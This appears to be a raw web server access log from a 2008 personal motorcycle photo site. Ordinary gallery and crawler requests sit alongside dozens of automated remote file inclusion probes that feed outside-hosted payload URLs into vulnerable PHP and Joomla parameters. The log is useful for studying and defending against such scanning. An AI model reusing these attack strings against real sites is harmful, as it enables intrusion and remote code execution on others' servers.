98.136.50.138 - - [26/Oct/2008:09:23:48 -0700] "GET /logs/access_080313.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
218.37.27.142 - - [26/Oct/2008:09:23:50 -0700] "GET /logs/access_080828.log//index.php?lg=http://www.sdpescadoresteruel.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:09:23:52 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
218.37.27.142 - - [26/Oct/2008:09:23:55 -0700] "GET /index.php?lg=http://www.sdpescadoresteruel.com/id.txt?? HTTP/1.1" 200 94826 "-" "libwww-perl/5.65" "www.dmulk.com"
195.210.42.40 - - [26/Oct/2008:09:23:56 -0700] "GET /phphtml.php?htmlclass_path=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:23:56 -0700] "GET /logs//index.php?lg=http://www.sdpescadoresteruel.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:23:58 -0700] "GET /logs/access_080214.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:09:24:02 -0700] "GET /logs/access_080218.log//agendax/addevent.inc.php?agendax_path=http://www.gosgo.com/bbs/idfeel.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
219.85.63.226 - - [26/Oct/2008:09:24:08 -0700] "GET /logs/access_080218.log//agendax/addevent.inc.php?agendax_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:24:11 -0700] "GET /errors.php?error=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
210.213.5.1 - - [26/Oct/2008:09:24:17 -0700] "GET /default.php?basepath=http://www.konkurent.ru/poll/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.83.106.201 - - [26/Oct/2008:09:24:19 -0700] "GET /logs/access_080905.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:24:26 -0700] "GET /default.php?basepath=http://www.konkurent.ru/poll/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:24:37 -0700] "GET /logs/access_080830.log/errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:24:37 -0700] "GET /errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:24:38 -0700] "GET /logs/errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:24:39 -0700] "GET /logs/access_080812.log/sub.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:24:40 -0700] "GET /sub.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:24:46 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:24:46 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:24:49 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-020.jpg HTTP/1.1" 200 427910 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:24:55 -0700] "GET /logs/access_080614.log/sub.php?menu=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:24:56 -0700] "GET /sub.php?menu=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
59.126.46.141 - - [26/Oct/2008:09:24:56 -0700] "GET /logs/access_080514.log//language.inc.php?langs_dir=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:24:59 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:24:59 -0700] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:25:01 -0700] "GET /logs/access_080723.log/errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:25:02 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-009_3.jpg HTTP/1.1" 200 531725 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
203.22.204.99 - - [26/Oct/2008:09:25:04 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.artemisfm.gr/main/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.99 - - [26/Oct/2008:09:25:04 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=http://www.artemisfm.gr/main/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:25:22 -0700] "GET /logs/access_080714.log/sub.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:25:27 -0700] "GET /logs/access_080323.log/sub.php?menu=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:25:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-168_0.jpg HTTP/1.1" 200 247211 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:26:09 -0700] "GET /logs/access_080518.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:26:10 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.168.50 - - [26/Oct/2008:09:26:10 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:26:15 -0700] "GET /logs/access_080826.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:26:15 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0020.jpg HTTP/1.1" 200 361318 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:26:28 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0031.jpg HTTP/1.1" 200 405520 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:26:28 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:26:29 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:09:26:29 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:26:35 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-079.jpg HTTP/1.1" 200 314695 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:26:49 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-052_1.jpg HTTP/1.1" 200 476439 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
208.83.106.201 - - [26/Oct/2008:09:26:53 -0700] "GET /logs/access_080313.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:26:54 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0018.jpg HTTP/1.1" 200 320247 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
208.83.106.201 - - [26/Oct/2008:09:26:58 -0700] "GET /logs/access_080905.log//components/com_lmo/lmo.php?mosConfig_absolute_path=http://www.gosgo.com/bbs/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:27:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-128_0.jpg HTTP/1.1" 200 488795 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
80.67.23.90 - - [26/Oct/2008:09:27:07 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:27:07 -0700] "GET /logs/access_080405.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.90 - - [26/Oct/2008:09:27:07 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:27:07 -0700] "GET /logs/access_080529.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://pwr.jp//acc/r0x.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:27:12 -0700] "GET /logs/sub.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:27:12 -0700] "GET /sub.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:27:15 -0700] "GET /logs/sub.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.6.36.125 - - [26/Oct/2008:09:27:15 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:27:15 -0700] "GET /sub.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:27:16 -0700] "GET /logs/access_080830.log/errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:27:17 -0700] "GET /errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:27:17 -0700] "GET /logs/errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.6.36.125 - - [26/Oct/2008:09:27:18 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)" "dmulk.com"
76.6.36.125 - - [26/Oct/2008:09:27:19 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)" "dmulk.com"
65.55.211.23 - - [26/Oct/2008:09:27:24 -0700] "GET /?D=A&show=slide&pageid=17&nggpage=3 HTTP/1.1" 200 146817 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:27:31 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:27:35 -0700] "GET /logs//localhost/[path]/common/init.php?CFG[CDIR]=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [26/Oct/2008:09:27:35 -0700] "GET /localhost/[path]/common/init.php?CFG[CDIR]=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.186.1.54 - - [26/Oct/2008:09:27:35 -0700] "GET /logs/access_080905.log//localhost/[path]/common/init.php?CFG[CDIR]=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:27:36 -0700] "GET /logs/access_080920.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.170.67 - - [26/Oct/2008:09:27:36 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.170.67 - - [26/Oct/2008:09:27:37 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.84.146.23 - - [26/Oct/2008:09:27:39 -0700] "GET /logs/access_080723.log/errors.php?error=http://kukesii.t35.com/net.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.69.231.178 - - [26/Oct/2008:09:27:47 -0700] "GET /logs/access_080920.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:27:48 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
208.69.231.178 - - [26/Oct/2008:09:27:48 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://picolomini1234.t35.com/ALB?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
76.6.36.125 - - [26/Oct/2008:09:27:51 -0700] "GET /bikes/dteel/2008-05-30/IMG_4646M.JPG HTTP/1.1" 404 275 "http://www.st-owners.com/forums/showthread.php?t=32353&page=6" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)" "dmulk.com"
72.249.108.100 - - [26/Oct/2008:09:27:55 -0700] "GET /logs/access_080916.log//index2.php?page=http://g00.g0.ohost.de/drc/shinguzmangs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:27:55 -0700] "GET /logs/sub.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:09:27:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-022_1.jpg HTTP/1.1" 200 431943 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:27:56 -0700] "GET /sub.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:28:07 -0700] "GET /logs/sub.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:28:07 -0700] "GET /sub.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.191.226.77 - - [26/Oct/2008:09:28:28 -0700] "GET /bikes/dteel/2008_08_17/IMG_5163s.JPG HTTP/1.1" 200 325776 "http://www.st-owners.com/forums/showthread.php?t=42795&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:28:28 -0700] "GET /bikes/dteel/2008_08_17/IMG_4445tag.JPG HTTP/1.1" 200 311123 "http://www.st-owners.com/forums/showthread.php?t=42795&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:28:30 -0700] "GET /bikes/dteel/2008_08_17/IMG_4447plack.JPG HTTP/1.1" 200 228191 "http://www.st-owners.com/forums/showthread.php?t=42795&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
65.55.211.23 - - [26/Oct/2008:09:28:31 -0700] "GET /blog/index.php/category/motorcycles/page/2/?show=gallery&nggpage=5 HTTP/1.1" 200 9665 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
65.55.211.23 - - [26/Oct/2008:09:28:32 -0700] "GET /blog/index.php/2008/08/12/?show=gallery&nggpage=9 HTTP/1.1" 200 89729 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "dmulk.com"
208.191.226.77 - - [26/Oct/2008:09:28:43 -0700] "GET /bikes/dteel/2008_09_01/IMG_5181s.JPG HTTP/1.1" 200 348105 "http://www.st-owners.com/forums/showthread.php?t=42795&page=4" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
208.191.226.77 - - [26/Oct/2008:09:28:43 -0700] "GET /bikes/dteel/2008_09_01/IMG_5183s.JPG HTTP/1.1" 200 368616 "http://www.st-owners.com/forums/showthread.php?t=42795&page=4" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
89.218.85.18 - - [26/Oct/2008:09:28:43 -0700] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:28:44 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.214.161.239 - - [26/Oct/2008:09:28:45 -0700] "GET /logs/access_080908.log//index.php?DOCUMENT_ROOT=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.191.226.77 - - [26/Oct/2008:09:28:45 -0700] "GET /bikes/dteel/2008_09_05/IMG_2122s.JPG HTTP/1.1" 200 88679 "http://www.st-owners.com/forums/showthread.php?t=42795&page=4" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:28:46 -0700] "GET /bikes/dteel/2008_09_05/IMG_2131s.JPG HTTP/1.1" 200 111639 "http://www.st-owners.com/forums/showthread.php?t=42795&page=4" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
211.214.161.239 - - [26/Oct/2008:09:28:46 -0700] "GET /index.php?DOCUMENT_ROOT=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 200 94801 "-" "libwww-perl/5.65" "www.dmulk.com"
211.214.161.239 - - [26/Oct/2008:09:28:47 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://sayphoto.net/bbs/idd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.186.1.54 - - [26/Oct/2008:09:28:50 -0700] "GET /logs/access_071220.log//localhost/[path]/common/init.php?CFG[CDIR]=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
208.191.226.77 - - [26/Oct/2008:09:28:51 -0700] "GET /bikes/dteel/2008_09_13/IMG_5191s.JPG HTTP/1.1" 200 331947 "http://www.st-owners.com/forums/showthread.php?t=42795&page=5" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:28:51 -0700] "GET /bikes/dteel/2008_09_13/IMG_5198s.JPG HTTP/1.1" 200 228286 "http://www.st-owners.com/forums/showthread.php?t=42795&page=5" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
208.191.226.77 - - [26/Oct/2008:09:28:53 -0700] "GET /bikes/dteel/2008_09_13/IMG_5201s.JPG HTTP/1.1" 200 302858 "http://www.st-owners.com/forums/showthread.php?t=42795&page=5" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
208.191.226.77 - - [26/Oct/2008:09:28:53 -0700] "GET /bikes/dteel/2008_09_19/IMG_5286s.JPG HTTP/1.1" 200 361719 "http://www.st-owners.com/forums/showthread.php?t=42795&page=5" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:28:58 -0700] "GET /logs/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.artemisfm.gr/main/sistem.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:28:58 -0700] "GET /dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=http://www.artemisfm.gr/main/sistem.txt%20? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
65.55.110.190 - - [26/Oct/2008:09:28:59 -0700] "GET /?D=A&show=slide&pageid=17&nggpage=3 HTTP/1.0" 200 146763 "http://search.live.com/results.aspx?q=allan" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:28:59 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://www.dmulk.com/?D=A&show=slide&pageid=17&nggpage=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.190 - - [26/Oct/2008:09:29:00 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://www.dmulk.com/?D=A&show=slide&pageid=17&nggpage=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
65.55.110.190 - - [26/Oct/2008:09:29:00 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://www.dmulk.com/?D=A&show=slide&pageid=17&nggpage=3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "dmulk.com"
